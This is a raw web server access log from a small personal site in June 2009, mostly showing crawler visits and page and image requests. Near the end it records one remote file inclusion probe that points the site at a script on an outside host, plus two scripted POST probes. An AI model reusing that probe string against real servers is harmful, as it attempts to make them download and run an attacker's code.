93.92.248.11 - - [28/Jun/2009:10:56:35 +0200] "GET /zampa-lovers/Kralle.gif HTTP/1.0" 200 260 "http://www.various-euro.com/zampa-lovers/index.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:36 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.0" 200 91514 "http://www.various-euro.com/frame-unten.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:39 +0200] "GET /bannerz/ve.jpg HTTP/1.0" 200 36912 "http://www.various-euro.com/frame-unten.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:41 +0200] "GET /zampa-lovers/zampamali.gif HTTP/1.0" 200 2617 "http://www.various-euro.com/zampa-lovers/index.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:42 +0200] "GET /zampa-lovers/zampa-2X2.gif HTTP/1.0" 200 6948 "http://www.various-euro.com/zampa-lovers/index.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:34 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.0" 200 271221 "http://www.various-euro.com/zampa-lovers/index.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:31 +0200] "GET /zampa-lovers/zampa.gif HTTP/1.0" 200 460627 "http://www.various-euro.com/zampa-lovers/index.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
93.92.248.11 - - [28/Jun/2009:10:56:43 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.0" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
74.6.18.228 - - [28/Jun/2009:11:00:06 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:11:00:06 +0200] "GET /framez.html HTTP/1.0" 200 3959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:11:00:09 +0200] "GET /style/various-euro.css HTTP/1.0" 304 - "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:11:00:15 +0200] "GET /frame-menu.html HTTP/1.0" 200 10500 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:11:00:15 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:11:00:15 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 7688 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.14.199.8 - - [28/Jun/2009:11:19:43 +0200] "GET / HTTP/1.1" 302 353 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
74.6.18.228 - - [28/Jun/2009:11:28:26 +0200] "GET /logs/usage_200712.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.106.137 - - [28/Jun/2009:11:38:28 +0200] "GET /framez.html HTTP/1.1" 200 3959 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.14.199.85 - - [28/Jun/2009:11:42:47 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
38.99.13.116 - - [28/Jun/2009:12:05:39 +0200] "GET /robots.txt HTTP/1.0" 302 363 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.72.227 - - [28/Jun/2009:12:07:10 +0200] "GET /logs/usage_200906.html HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.202.41.3 - - [28/Jun/2009:12:46:01 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
66.249.72.227 - - [28/Jun/2009:12:54:24 +0200] "GET /f-horrorkatze.html HTTP/1.1" 200 7865 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.si/search?hl=sl&client=firefox-a&channel=s&rls=org.mozilla:sl:official&hs=Y3X&ei=pFBHSsSCI4uHsAb33fEF&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=EVRO+TURIC+IGRE&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.si/search?hl=sl&client=firefox-a&channel=s&rls=org.mozilla:sl:official&hs=Y3X&ei=pFBHSsSCI4uHsAb33fEF&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=EVRO+TURIC+IGRE&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.si/search?hl=sl&client=firefox-a&channel=s&rls=org.mozilla:sl:official&hs=Y3X&ei=pFBHSsSCI4uHsAb33fEF&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=EVRO+TURIC+IGRE&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.si/search?hl=sl&client=firefox-a&channel=s&rls=org.mozilla:sl:official&hs=Y3X&ei=pFBHSsSCI4uHsAb33fEF&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=EVRO+TURIC+IGRE&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /frame-menu.html HTTP/1.1" 200 10500 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /zampa-lovers/DRAGAN_Z.JPG HTTP/1.1" 200 6850 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /zampa-lovers/MILIZA_2.JPG HTTP/1.1" 200 22172 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /zampa-lovers/MILIZA_3.JPG HTTP/1.1" 200 26924 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:32 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /zampa-lovers/ZAMPAMA2.MPG HTTP/1.1" 200 63492 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:33 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.1" 200 271221 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:34 +0200] "GET /zampa-lovers/DRAGANZA.JPG HTTP/1.1" 200 18560 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:34 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:34 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:37 +0200] "GET /zampa-lovers/MILIZA_B.JPG HTTP/1.1" 200 10947 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:35 +0200] "GET /zampa-lovers/1SEITEVE.GIF HTTP/1.1" 200 78726 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:38 +0200] "GET /zampa-lovers/Kralle.gif HTTP/1.1" 200 260 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:38 +0200] "GET /zampa-lovers/zampa-2X2.gif HTTP/1.1" 200 6948 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:38 +0200] "GET /zampa-lovers/MILIZA_4.JPG HTTP/1.1" 200 9946 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:38 +0200] "GET /zampa-lovers/zampamali.gif HTTP/1.1" 200 2617 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:36 +0200] "GET /zampa-lovers/2SEITEVE.GIF HTTP/1.1" 200 83466 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:34 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
213.250.11.242 - - [28/Jun/2009:13:25:38 +0200] "GET /zampa-lovers/zampa.gif HTTP/1.1" 200 460627 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
216.129.119.49 - - [28/Jun/2009:13:33:24 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.106.233 - - [28/Jun/2009:13:40:29 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.233 - - [28/Jun/2009:13:45:27 +0200] "GET /zampa/montenegro/MILOW.html HTTP/1.1" 200 860 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.211.171 - - [28/Jun/2009:13:57:01 +0200] "GET /f-warez.html HTTP/1.1" 200 10953 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.179 - - [28/Jun/2009:14:19:26 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.179 - - [28/Jun/2009:14:19:26 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.30.79.115 - - [28/Jun/2009:14:21:53 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.115 - - [28/Jun/2009:14:21:54 +0200] "GET /style/various-euro.css HTTP/1.0" 200 3437 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.14.199.8 - - [28/Jun/2009:14:42:50 +0200] "GET / HTTP/1.1" 302 353 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
72.14.199.85 - - [28/Jun/2009:14:42:52 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
74.6.18.228 - - [28/Jun/2009:15:16:14 +0200] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:15:33:42 +0200] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.227.119.6 - - [28/Jun/2009:15:40:24 +0200] "GET /DgH/ HTTP/1.0" 200 5024 "-" "-"
79.76.174.148 - - [28/Jun/2009:15:47:14 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5 (.NET CLR 3.5.30729)"
79.76.174.148 - - [28/Jun/2009:15:47:14 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5 (.NET CLR 3.5.30729)"
79.76.174.148 - - [28/Jun/2009:15:47:14 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5 (.NET CLR 3.5.30729)"
66.249.72.227 - - [28/Jun/2009:15:55:41 +0200] "GET /f-euro.html HTTP/1.1" 200 12203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.99.44.105 - - [28/Jun/2009:15:57:38 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
65.55.211.172 - - [28/Jun/2009:16:23:04 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.172 - - [28/Jun/2009:16:23:04 +0200] "GET /neon/code.html HTTP/1.1" 200 1109 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.16.94.2 - - [28/Jun/2009:16:24:55 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
67.16.94.2 - - [28/Jun/2009:16:24:56 +0200] "GET / HTTP/1.0" 200 7869 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.google.com/search?hl=en&q=turi+kurac&aq=f&oq=&aqi=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /frame-menu.html HTTP/1.1" 200 10500 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /zampa-lovers/DRAGAN_Z.JPG HTTP/1.1" 200 6850 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /zampa-lovers/ZAMPAMA2.MPG HTTP/1.1" 200 63492 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:55 +0200] "GET /zampa-lovers/ZAMPAMAS.MPG HTTP/1.1" 200 520196 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:55 +0200] "GET /zampa-lovers/MILIZA_2.JPG HTTP/1.1" 200 22172 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:56 +0200] "GET /zampa-lovers/MILIZA_4.JPG HTTP/1.1" 200 9946 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:55 +0200] "GET /zampa-lovers/MILIZA_3.JPG HTTP/1.1" 200 26924 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:55 +0200] "GET /zampa-lovers/WASISTMI1.MPG HTTP/1.1" 200 271221 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:54 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:56 +0200] "GET /zampa-lovers/1SEITEVE.GIF HTTP/1.1" 200 78726 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:58 +0200] "GET /zampa-lovers/MILIZA_B.JPG HTTP/1.1" 200 10947 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:57 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:02:00 +0200] "GET /zampa-lovers/Kralle.gif HTTP/1.1" 200 260 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:02:00 +0200] "GET /zampa-lovers/zampa-2X2.gif HTTP/1.1" 200 6948 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:02:00 +0200] "GET /zampa-lovers/zampamali.gif HTTP/1.1" 200 2617 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:57 +0200] "GET /zampa-lovers/2SEITEVE.GIF HTTP/1.1" 200 83466 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:59 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:01:56 +0200] "GET /zampa-lovers/DRAGANZA.JPG HTTP/1.1" 200 18560 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
217.169.223.179 - - [28/Jun/2009:17:02:00 +0200] "GET /zampa-lovers/zampa.gif HTTP/1.1" 200 460627 "http://www.various-euro.com/zampa-lovers/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.6.18.228 - - [28/Jun/2009:17:17:07 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.204.105 - - [28/Jun/2009:17:37:30 +0200] "POST /s/s.pl HTTP/1.0" 404 2748 "http://various-euro.com/s/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
8.9.222.1 - - [28/Jun/2009:17:37:34 +0200] "POST /s/s.pl HTTP/1.1" 404 2748 "http://various-euro.com/s/s.pl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.14.199.8 - - [28/Jun/2009:17:56:18 +0200] "GET / HTTP/1.1" 302 353 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
72.14.199.85 - - [28/Jun/2009:17:56:18 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
74.6.18.228 - - [28/Jun/2009:17:59:26 +0200] "GET /zampa/montenegro/ HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.106.244 - - [28/Jun/2009:17:59:55 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.6.18.228 - - [28/Jun/2009:18:03:44 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [28/Jun/2009:18:07:16 +0200] "GET /games/virtualcop/virtualcop.html HTTP/1.0" 200 4487 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.142.24.241 - - [28/Jun/2009:18:12:28 +0200] "GET //?f=http://othteam5.t35.com/idv6.txt??? HTTP/1.1" 200 7869 "-" "libwww-perl/5.805"
74.182.40.223 - - [28/Jun/2009:18:33:50 +0200] "GET / HTTP/1.1" 200 7869 "http://www.randomwebsite.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:50 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
74.182.40.223 - - [28/Jun/2009:18:33:50 +0200] "GET /style/various-euro.css HTTP/1.1" 200 3437 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
